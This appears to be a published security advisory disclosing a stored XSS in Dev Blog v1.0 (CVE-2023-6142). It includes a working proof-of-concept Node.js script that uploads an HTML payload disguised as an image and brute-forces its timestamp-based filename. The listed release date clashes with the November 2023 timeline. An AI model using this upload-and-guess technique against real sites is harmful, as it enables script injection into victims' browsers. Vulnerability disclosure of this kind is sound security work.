

Advisories

Dev Blog v1.0 - Stored XSS

6.4

Medium

Discovered by

Carlos Bello

Offensive Team, Fluid Attacks

Summary

Full name

Dev Blog v1.0 - Stored cross site scripting

Code name

Bad Bunny

State

Public

Release date

Apr 10, 2023

Affected product

Dev Blog

Affected version(s)

v1.0

Vulnerability name

Stored cross-site scripting (Stored XSS)

Vulnerability type

010. Stored cross-site scripting

Remotely exploitable

Yes

CVSS v3.1 vector string

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L

CVSS v3.1 base score

6.4

Exploit available

Yes

CVE ID(s)

CVE-2023-6142

Description

Dev blog v1.0 allows to exploit an XSS through an unrestricted file upload, together with a bad entropy of filenames. With this an attacker can upload a malicious HTML file, then guess the filename of the uploaded file and send it to a potential victim.

Vulnerability

A Stored cross-Site scripting (XSS) vulnerability has been identified in Dev blog, which allows an attacker to attacker to execute arbitrary JS code in the browser of any user of the application.

Exploit

exploit.html

<script>
 alert(1)
</script>

exploit.js

const FormData = require('form-data');
const axios = require('axios');
const fs = require('fs');

const url = 'http://127.0.0.1:3000/admin/add';

const formData = new FormData();

formData.append('title', 'junk');
formData.append('subtitle', 'junk');
formData.append('image', fs.createReadStream('./exploit.html'), {
 filename: 'exploit.html',
 contentType: 'image/jpeg'
});
formData.append('content', 'junk');

const config = {
 headers: {
 ...formData.getHeaders(),
 'Content-Length': formData.length,
 'Cookie': 'user=admin',
 },
};

initialDate = Date.now()

axios.post(url, formData, config)
 .then((response) => {
 endDate = Date.now()

 const baseUrl = 'http://127.0.0.1:3000/images/';
 const fileExtension = '.html';

 for (let currentTime = initialDate; currentTime <= endDate; currentTime += 1) {
 const badUrl = `${baseUrl}${currentTime}${fileExtension}`;
 fetch(badUrl)
 .then(response => {
          if (response.ok) {
            console.log("The file name is: " + badUrl);
          }
        })
    }
  })

Our security policy

We have reserved the ID CVE-2023-6142 to refer to this issue from now on.

Disclosure policy

System Information

Version: Dev Blog v1.0
Operating System: MacOS

Mitigation

There is currently no patch available for this vulnerability.

References

Vendor page https://github.com/Armanidrisi/devblog/

Timeline



Vulnerability discovered

Nov 14, 2023



Vendor Confirmed Vuln.

Nov 14, 2023



Vendor contacted

Nov 14, 2023



Public disclosure

Nov 15, 2023

Start your 21-day free trial

Discover the benefits of our Continuous Hacking solution, which organizations of all sizes are already enjoying.

Try for free

Contact sales

Start your 21-day free trial

Discover the benefits of our Continuous Hacking solution, which organizations of all sizes are already enjoying.

Try for free

Contact sales

Start your 21-day free trial

Discover the benefits of our Continuous Hacking solution, which organizations of all sizes are already enjoying.

Try for free

Contact sales

Solution

Plans

Resources

Advisories

Company

Select Language



Contact sales

Try for free

Select Language



Contact sales

Try for free

Solution

Plans

Resources

Advisories

Company

Select Language



Contact sales

Try for free

Select Language



Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.